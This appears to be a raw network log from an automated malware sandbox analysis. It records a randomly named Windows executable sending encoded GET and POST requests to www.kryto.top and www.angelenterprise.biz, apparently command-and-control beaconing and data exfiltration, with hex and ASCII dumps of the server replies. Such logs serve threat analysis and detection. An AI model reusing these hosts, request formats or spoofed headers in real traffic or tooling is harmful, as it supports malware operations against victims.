                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 [TRUNCATED]
                        Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="/42.css"></head><body>... partial:index.partial.html --><main> <svg viewBox="0 0 541.17206 328.45184" height="328.45184" width="541.17206" id="svg2" version="1.1"> <metadata id="metadata8"> </metadata> <defs id="defs6"> <pattern patternUnits="userSpaceOnUse" width="1.5" height="1" patternTransform="translate(0,0) scale(10,10)" id="Strips2_1"> <rect style="fill:black;stroke:none" x="0" y="-0.5" width="1" height="2" id="rect5419" /> </pattern> <linearGradient osb:paint="solid" id="linearGradient6096"> <stop id="stop6094" offset="0" [TRUNCATED]
                        Sep 9, 2024 04:52:43.748162985 CEST | 224 | IN | Data Raw: 3e 0a 20 20 20 20 3c 2f 64 65 66 73 3e 0a 20 20 20 20 3c 67 0a 20 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 31 37 30 2e 31 34 35 31 35 2c 30 2e 30 33 38 31 36 34 29 22 0a 20 20 20 20 20 20 20 69 64 3d 22 6c
                        Data Ascii: > </defs> <g transform="translate(170.14515,0.038164)" id="layer1"> <g id="g6219" > <path transform="matrix(1.0150687,0,0,11.193923,-1.3895945,-2685.7441)"
                        Sep 9, 2024 04:52:43.748173952 CEST | 1236 | IN | Data Raw: 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 66 69 6c 6c 3a 23 30 30 30 30 30 30 3b 66 69 6c 6c 2d 6f 70 61 63 69 74 79 3a 31 3b 73 74 72 6f 6b 65 3a 23 30 30 30 30 30 30 3b 73 74 72 6f 6b 65 2d 77 69
                        Data Ascii: style="display:inline;fill:#000000;fill-opacity:1;stroke:#000000;stroke-width:0.1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" d="m 145.0586,263.51309 c -90.20375,-0.0994 -119.20375,-0.0994 -119.20375,-0.09
                        Sep 9, 2024 04:52:43.748189926 CEST | 1236 | IN | Data Raw: 3b 73 74 72 6f 6b 65 2d 6f 70 61 63 69 74 79 3a 31 3b 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 70 61 74 68 34 34 39 36 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22
                        Data Ascii: ;stroke-opacity:1;" /> <path id="path4496" d="m 85.115421,100.5729 c -0.0036,3.37532 -0.0071,6.75165 -0.0107,10.12897 m 0.512159,0.18258 c -1.914603,-0.23621 -3.505591,1.17801 -4.861444,2.68113 -1.355853,1.5
                        Sep 9, 2024 04:52:43.748203039 CEST | 1236 | IN | Data Raw: 3b 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 70 61 74 68 34 35 31 33 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22 6d 20 37 34 2e 36 38 37 35 2c 31 32 35 2e 30 33 37
                        Data Ascii: ;" /> <path id="path4513" d="m 74.6875,125.03748 c -8.394789,7.68654 -16.790624,15.37405 -23.988969,22.38484 -7.198345,7.0108 -13.197555,13.3433 -18.781379,20.01048 -5.583823,6.66719 -10.749655,13.66605 -13.
                        Sep 9, 2024 04:52:43.748214006 CEST | 672 | IN | Data Raw: 23 30 30 30 30 30 30 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 31 70 78 3b 73 74 72 6f 6b 65 2d 6c 69 6e 65 63 61 70 3a 62 75 74 74 3b 73 74 72 6f 6b 65 2d 6c 69 6e 65 6a 6f 69 6e 3a 6d 69 74 65 72 3b 73 74 72 6f 6b 65 2d 6f 70 61 63 69 74 79 3a
                        Data Ascii: #000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4521" d="m 96.8125,126.22498 c 6.89586,6.45836 13.7917,12.9167 19.98957,19.14581 6.19786,6.22912 11.6978
                        Sep 9, 2024 04:52:43.748231888 CEST | 1236 | IN | Data Raw: 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 70 61 74 68 34 35 32 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22 6d 20 39 31 2e 39 33 37 35 2c 31 32 34 2e 30 39 39 39 38 20
                        Data Ascii: /> <path id="path4525" d="m 91.9375,124.09998 c 5.854072,7.16655 11.70824,14.33322 16.21863,20.16651 4.51039,5.83328 7.67706,10.33329 11.92718,16.33346 4.25012,6.00017 9.58322,13.49984 12.66653,18.58299 3.08
                        Sep 9, 2024 04:52:43.748243093 CEST | 1236 | IN | Data Raw: 39 34 33 35 31 37 2c 34 2e 31 32 37 39 35 20 32 2e 38 32 37 35 33 35 2c 31 31 2e 31 39 33 30 32 20 34 2e 30 36 35 30 30 35 2c 31 36 2e 30 32 35 30 31 20 31 2e 32 33 37 34 38 2c 34 2e 38 33 32 20 31 2e 38 32 36 36 38 2c 37 2e 34 32 34 34 37 20 32
                        Data Ascii: 943517,4.12795 2.827535,11.19302 4.065005,16.02501 1.23748,4.832 1.82668,7.42447 2.12139,10.84263 0.29471,3.41815 0.29471,7.65958 -0.11785,20.44893 -0.41255,12.78934 -1.23731,34.11536 -2.18014,53.62015 -0.94282,19.50478 -2.003429,37.18159 -3.0
                        Sep 9, 2024 04:52:43.748255968 CEST | 448 | IN | Data Raw: 35 34 2e 32 30 37 36 37 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 66 69 6c 6c 3a 6e 6f 6e 65 3b 73 74 72 6f 6b 65 3a 23 30 30 30 30 30 30 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68
                        Data Ascii: 54.20767" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4549" d="m 79.25478,124.23266 c -5.440192,
                        Sep 9, 2024 04:52:43.748266935 CEST | 1236 | IN | Data Raw: 39 35 2c 35 33 2e 38 34 37 34 36 20 32 2e 32 33 37 39 31 33 2c 31 39 2e 33 37 38 32 39 20 34 2e 38 33 33 31 30 39 2c 33 36 2e 37 31 38 39 32 20 37 2e 34 32 35 39 35 39 2c 35 34 2e 30 34 33 38 37 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74
                        Data Ascii: 95,53.84746 2.237913,19.37829 4.833109,36.71892 7.425959,54.04387" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="pa
                        Sep 9, 2024 04:52:43.753390074 CEST | 1236 | IN | Data Raw: 34 35 38 30 36 2c 33 36 2e 38 33 32 31 36 20 2d 31 32 2e 36 38 37 35 2c 35 35 2e 32 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 66 69 6c 6c 3a 6e 6f 6e 65 3b 73 74 72 6f 6b 65
                        Data Ascii: 45806,36.83216 -12.6875,55.25" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <ellipse ry="4.6715717" rx="2.5"


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        16 | 192.168.2.4 | 49758 | 162.0.213.94 | 80 | 2132 | C:\Program Files (x86)\GeKEJexjzTYsUzKOsloCPcDUKICkeCqhPIqCxDtaCtAnddYHHLqbL\kdFPsEWDpy.exe
                        Timestamp | Bytes transferred | Direction | Data
                        Sep 9, 2024 04:52:45.616488934 CEST | 490 | OUT | GET /09dt/?lt=rbfG5gS9WKSJFi6dUtliAmup1VBkpZqBcQUpaxDzzhML0bBwD+Qj3UGhdh/xQ289mI9ftdcjEJi/URIx5SNFZ5ISx4hWtAA8ETmF0fwXx3j+/89J/je5YeA=&3ry=nj20Xr HTTP/1.1
                        Host: www.kryto.top
                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                        Accept-Language: en-US,en;q=0.5
                        Connection: close
                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; GT-P5200 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.78 Safari/537.36 OPR/30.0.1856.95530
                        Sep 9, 2024 04:52:46.258069038 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                        Date: Mon, 09 Sep 2024 02:52:46 GMT
                        Server: Apache
                        Content-Length: 16052
                        Connection: close
                        Content-Type: text/html; charset=utf-8
                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 [TRUNCATED]
                        Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="/42.css"></head><body>... partial:index.partial.html --><main> <svg viewBox="0 0 541.17206 328.45184" height="328.45184" width="541.17206" id="svg2" version="1.1"> <metadata id="metadata8"> </metadata> <defs id="defs6"> <pattern patternUnits="userSpaceOnUse" width="1.5" height="1" patternTransform="translate(0,0) scale(10,10)" id="Strips2_1"> <rect style="fill:black;stroke:none" x="0" y="-0.5" width="1" height="2" id="rect5419" /> </pattern> <linearGradient osb:paint="solid" id="linearGradient6096"> <stop id="stop6094" offset="0" [TRUNCATED]
                        Sep 9, 2024 04:52:46.258088112 CEST | 1236 | IN | Data Raw: 2f 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 3e 0a 20 20 20 20 3c 2f 64 65 66 73 3e 0a 20 20 20 20 3c 67 0a 20 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 31 37 30 2e 31 34 35 31 35 2c 30 2e 30 33 38 31 36 34
                        Data Ascii: /linearGradient> </defs> <g transform="translate(170.14515,0.038164)" id="layer1"> <g id="g6219" > <path transform="matrix(1.0150687,0,0,11.193923,-1.3895945,-2685.7441)"
                        Sep 9, 2024 04:52:46.258097887 CEST | 1236 | IN | Data Raw: 37 39 20 2d 30 2e 35 39 35 32 33 33 2c 2d 31 38 2e 38 35 38 37 31 35 20 2d 30 2e 36 30 32 31 37 35 2c 2d 33 31 2e 34 36 39 32 32 38 20 2d 30 2e 30 31 32 35 33 2c 2d 32 32 2e 37 35 39 35 36 35 20 30 2e 37 31 37 32 36 32 2c 2d 34 31 2e 32 33 31 34
                        Data Ascii: 79 -0.595233,-18.858715 -0.602175,-31.469228 -0.01253,-22.759565 0.717262,-41.23145213 1.628995,-41.23195399 z" style="display:inline;fill:#000000;stroke:none;stroke-width:0.23743393px;stroke-linecap:butt;stroke-linejoin:miter;str
                        Sep 9, 2024 04:52:46.258110046 CEST | 672 | IN | Data Raw: 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 30 30 2e 37 36 32 37 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 34 35 35 33 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c
                        Data Ascii: width="100.76272" id="rect4553" style="display:inline;opacity:1;fill:#000000;fill-opacity:1;fill-rule:nonzero;stroke:#000000;stroke-width:1.00157475;stroke-miterlimit:4;stroke-dasharray:none;stroke-opacity:1;" /
                        Sep 9, 2024 04:52:46.258121014 CEST | 1236 | IN | Data Raw: 31 36 37 36 20 39 2e 37 39 38 33 35 36 2c 33 35 2e 39 31 36 37 35 20 31 35 2e 31 38 30 32 36 37 2c 35 33 2e 34 31 37 33 38 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 66 69 6c 6c
                        Data Ascii: 1676 9.798356,35.91675 15.180267,53.41738" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4517" d="
                        Sep 9, 2024 04:52:46.258131027 CEST | 224 | IN | Data Raw: 31 31 2e 39 39 36 39 38 20 2d 34 2e 38 31 36 31 36 2c 32 34 2e 33 33 36 33 32 20 2d 38 2e 34 32 30 36 33 2c 33 38 2e 39 39 38 30 39 20 2d 33 2e 36 30 34 34 38 2c 31 34 2e 36 36 31 37 37 20 2d 38 2e 30 36 32 31 32 2c 33 31 2e 31 37 31 35 34 20 2d
                        Data Ascii: 11.99698 -4.81616,24.33632 -8.42063,38.99809 -3.60448,14.66177 -8.06212,31.17154 -12.56244,47.83939" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stro
                        Sep 9, 2024 04:52:46.258142948 CEST | 1236 | IN | Data Raw: 6b 65 2d 6f 70 61 63 69 74 79 3a 31 3b 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 70 61 74 68 34 35 32 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22 6d 20 39 31 2e
                        Data Ascii: ke-opacity:1;" /> <path id="path4525" d="m 91.9375,124.09998 c 5.854072,7.16655 11.70824,14.33322 16.21863,20.16651 4.51039,5.83328 7.67706,10.33329 11.92718,16.33346 4.25012,6.00017 9.58322,13.49984 12.6665
                        Sep 9, 2024 04:52:46.258153915 CEST | 1236 | IN | Data Raw: 30 32 31 2c 31 31 2e 31 31 30 35 32 20 30 2e 39 34 33 35 31 37 2c 34 2e 31 32 37 39 35 20 32 2e 38 32 37 35 33 35 2c 31 31 2e 31 39 33 30 32 20 34 2e 30 36 35 30 30 35 2c 31 36 2e 30 32 35 30 31 20 31 2e 32 33 37 34 38 2c 34 2e 38 33 32 20 31 2e
                        Data Ascii: 021,11.11052 0.943517,4.12795 2.827535,11.19302 4.065005,16.02501 1.23748,4.832 1.82668,7.42447 2.12139,10.84263 0.29471,3.41815 0.29471,7.65958 -0.11785,20.44893 -0.41255,12.78934 -1.23731,34.11536 -2.18014,53.62015 -0.94282,19.50478 -2.00342
                        Sep 9, 2024 04:52:46.258169889 CEST | 448 | IN | Data Raw: 30 30 30 34 39 20 33 2e 37 31 32 30 30 35 2c 35 34 2e 32 30 37 36 37 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 66 69 6c 6c 3a 6e 6f 6e 65 3b 73 74 72 6f 6b 65 3a 23 30 30 30 30
                        Data Ascii: 00049 3.712005,54.20767" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4549" d="m 79.25478,124.232
                        Sep 9, 2024 04:52:46.258229971 CEST | 1236 | IN | Data Raw: 33 34 2e 34 36 39 31 37 20 35 2e 30 36 36 30 39 35 2c 35 33 2e 38 34 37 34 36 20 32 2e 32 33 37 39 31 33 2c 31 39 2e 33 37 38 32 39 20 34 2e 38 33 33 31 30 39 2c 33 36 2e 37 31 38 39 32 20 37 2e 34 32 35 39 35 39 2c 35 34 2e 30 34 33 38 37 22 0a
                        Data Ascii: 34.46917 5.066095,53.84746 2.237913,19.37829 4.833109,36.71892 7.425959,54.04387" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path
                        Sep 9, 2024 04:52:46.262989044 CEST | 1236 | IN | Data Raw: 32 38 39 2c 31 38 2e 34 31 35 35 20 2d 38 2e 34 35 38 30 36 2c 33 36 2e 38 33 32 31 36 20 2d 31 32 2e 36 38 37 35 2c 35 35 2e 32 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 66
                        Data Ascii: 289,18.4155 -8.45806,36.83216 -12.6875,55.25" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <ellipse ry="4.6715717"


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        17 | 192.168.2.4 | 49759 | 3.33.130.190 | 80 | 2132 | C:\Program Files (x86)\GeKEJexjzTYsUzKOsloCPcDUKICkeCqhPIqCxDtaCtAnddYHHLqbL\kdFPsEWDpy.exe
                        Timestamp | Bytes transferred | Direction | Data
                        Sep 9, 2024 04:52:51.419115067 CEST | 783 | OUT | POST /efkd/ HTTP/1.1
                        Host: www.angelenterprise.biz
                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                        Accept-Encoding: gzip, deflate, br
                        Accept-Language: en-US,en;q=0.5
                        Content-Length: 199
                        Connection: close
                        Cache-Control: no-cache
                        Content-Type: application/x-www-form-urlencoded
                        Origin: http://www.angelenterprise.biz
                        Referer: http://www.angelenterprise.biz/efkd/
                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; GT-P5200 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.78 Safari/537.36 OPR/30.0.1856.95530
                        Data Raw: 6c 74 3d 46 73 33 2b 6d 75 6c 75 63 5a 43 67 79 45 4d 73 7a 32 59 73 49 50 57 2f 36 38 77 33 45 70 6e 79 2f 58 5a 59 6d 4e 4f 64 50 52 42 62 45 56 44 48 32 6a 59 6f 70 45 37 4f 42 46 71 69 75 79 57 69 41 39 4f 6e 44 44 4c 33 75 45 74 42 56 58 7a 6d 33 4e 6d 65 6c 52 49 61 4a 44 6d 64 51 78 4c 33 43 79 74 51 4a 41 6f 71 31 6e 54 4d 70 4c 59 46 6e 72 67 49 59 63 43 2f 46 43 39 33 56 4e 66 53 5a 53 62 50 77 5a 36 79 44 48 6c 59 75 72 6b 6a 34 30 78 59 4e 38 5a 4a 78 6a 72 35 44 37 53 67 32 52 79 43 4b 39 74 7a 77 73 67 35 49 30 47 38 39 73 79 6a 6a 4f 77 64 37 4b 48 39 46 33 52 71 4f 51 3d 3d
                        Data Ascii: lt=Fs3+mulucZCgyEMsz2YsIPW/68w3Epny/XZYmNOdPRBbEVDH2jYopE7OBFqiuyWiA9OnDDL3uEtBVXzm3NmelRIaJDmdQxL3CytQJAoq1nTMpLYFnrgIYcC/FC93VNfSZSbPwZ6yDHlYurkj40xYN8ZJxjr5D7Sg2RyCK9tzwsg5I0G89syjjOwd7KH9F3RqOQ==


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        18 | 192.168.2.4 | 49760 | 3.33.130.190 | 80 | 2132 | C:\Program Files (x86)\GeKEJexjzTYsUzKOsloCPcDUKICkeCqhPIqCxDtaCtAnddYHHLqbL\kdFPsEWDpy.exe
                        Timestamp | Bytes transferred | Direction | Data
                        Sep 9, 2024 04:52:53.966479063 CEST | 803 | OUT | POST /efkd/ HTTP/1.1
                        Host: www.angelenterprise.biz
                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                        Accept-Encoding: gzip, deflate, br
                        Accept-Language: en-US,en;q=0.5
                        Content-Length: 219
                        Connection: close
                        Cache-Control: no-cache
                        Content-Type: application/x-www-form-urlencoded
                        Origin: http://www.angelenterprise.biz
                        Referer: http://www.angelenterprise.biz/efkd/
                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; GT-P5200 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.78 Safari/537.36 OPR/30.0.1856.95530
                        Data Raw: 6c 74 3d 46 73 33 2b 6d 75 6c 75 63 5a 43 67 78 67 49 73 78 52 45 73 66 66 57 38 31 63 77 33 4f 4a 6e 32 2f 58 56 59 6d 49 2b 72 50 43 6c 62 45 31 7a 48 6b 53 59 6f 6b 6b 37 4f 59 31 71 64 67 53 57 54 41 39 4b 46 44 48 4c 33 75 41 39 42 56 56 72 6d 77 2b 4f 5a 6b 42 49 55 52 7a 6d 66 55 78 4c 33 43 79 74 51 4a 42 59 4d 31 6e 37 4d 70 61 6f 46 67 2f 30 48 52 38 43 2b 43 43 39 33 52 4e 65 62 5a 53 62 58 77 62 4f 59 44 45 4e 59 75 72 55 6a 34 6c 78 62 48 38 5a 50 2b 44 72 73 51 72 58 75 7a 7a 32 4e 4b 64 45 55 32 6f 73 6f 4a 79 58 6d 73 64 54 30 78 4f 55 75 6d 4e 4f 4a 49 30 73 6a 56 61 6f 64 35 74 6e 6d 6a 48 37 59 31 49 30 66 4c 70 76 54 64 4a 4d 3d
                        Data Ascii: lt=Fs3+mulucZCgxgIsxREsffW81cw3OJn2/XVYmI+rPClbE1zHkSYokk7OY1qdgSWTA9KFDHL3uA9BVVrmw+OZkBIURzmfUxL3CytQJBYM1n7MpaoFg/0HR8C+CC93RNebZSbXwbOYDENYurUj4lxbH8ZP+DrsQrXuzz2NKdEU2osoJyXmsdT0xOUumNOJI0sjVaod5tnmjH7Y1I0fLpvTdJM=


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        19 | 192.168.2.4 | 49761 | 3.33.130.190 | 80 | 2132 | C:\Program Files (x86)\GeKEJexjzTYsUzKOsloCPcDUKICkeCqhPIqCxDtaCtAnddYHHLqbL\kdFPsEWDpy.exe
                        Timestamp | Bytes transferred | Direction | Data
                        Sep 9, 2024 04:52:56.513890028 CEST | 10885 | OUT | POST /efkd/ HTTP/1.1
                        Host: www.angelenterprise.biz
                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                        Accept-Encoding: gzip, deflate, br
                        Accept-Language: en-US,en;q=0.5
                        Content-Length: 10299
                        Connection: close
                        Cache-Control: no-cache
                        Content-Type: application/x-www-form-urlencoded
                        Origin: http://www.angelenterprise.biz
                        Referer: http://www.angelenterprise.biz/efkd/
                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; GT-P5200 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.78 Safari/537.36 OPR/30.0.1856.95530
                        Data Raw: 6c 74 3d 46 73 33 2b 6d 75 6c 75 63 5a 43 67 78 67 49 73 78 52 45 73 66 66 57 38 31 63 77 33 4f 4a 6e 32 2f 58 56 59 6d 49 2b 72 50 43 74 62 45 6d 37 48 31 42 77 6f 72 45 37 4f 51 56 71 6d 67 53 57 4f 41 35 75 42 44 48 48 4a 75 43 31 42 55 32 6a 6d 78 50 4f 5a 74 42 49 55 4e 44 6d 65 51 78 4b 6a 43 32 41 59 4a 41 6b 4d 31 6e 37 4d 70 5a 77 46 32 37 67 48 64 63 43 2f 46 43 39 37 56 4e 65 7a 5a 53 44 74 77 62 61 69 43 31 74 59 75 4c 45 6a 72 6e 5a 62 4c 38 5a 4e 2f 44 71 70 51 71 72 6c 7a 7a 72 38 4b 64 42 7a 32 76 6b 6f 4c 47 61 67 30 50 54 6a 6e 39 30 4b 6b 75 75 4e 48 31 4e 68 61 5a 6b 61 32 63 72 4b 6a 55 6e 59 31 72 63 62 5a 35 58 35 4a 4d 38 45 5a 63 35 42 46 64 46 48 33 74 47 61 4e 6b 4a 64 38 56 6d 52 77 56 75 51 49 48 56 4d 34 51 74 73 72 37 4f 79 45 78 57 69 65 38 51 6e 44 51 48 78 7a 33 30 34 67 64 32 67 77 5a 43 46 4d 4b 2f 4b 76 49 6f 45 44 37 43 42 63 2f 6b 75 71 2b 74 71 6f 50 46 38 45 2b 41 4e 50 44 67 50 6d 59 77 72 43 41 45 6d 78 71 48 47 6e 76 74 39 75 58 69 4f 4d 70 68 71 6b 79 36 [TRUNCATED]
                        Data Ascii: lt=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 [TRUNCATED]


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        20 | 192.168.2.4 | 49762 | 3.33.130.190 | 80 | 2132 | C:\Program Files (x86)\GeKEJexjzTYsUzKOsloCPcDUKICkeCqhPIqCxDtaCtAnddYHHLqbL\kdFPsEWDpy.exe
                        Timestamp | Bytes transferred | Direction | Data
                        Sep 9, 2024 04:52:59.051961899 CEST | 500 | OUT | GET /efkd/?3ry=nj20Xr&lt=IufelbUCTKOeuwMN5EUqf6TB6ckeX6bIx1td5c35eyVbCG3IzyIKjn3SW0agpxesK9W5YHm3vT0AFFjY1MT7kmsSBjfmSD/gL3FGHQgm/hfO+eZf+Z8hf6A= HTTP/1.1
                        Host: www.angelenterprise.biz
                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                        Accept-Language: en-US,en;q=0.5
                        Connection: close
                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; GT-P5200 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.78 Safari/537.36 OPR/30.0.1856.95530
                        Sep 9, 2024 04:52:59.534921885 CEST | 389 | IN | HTTP/1.1 200 OK
                        Server: openresty
                        Date: Mon, 09 Sep 2024 02:52:59 GMT
                        Content-Type: text/html
                        Content-Length: 249
                        Connection: close
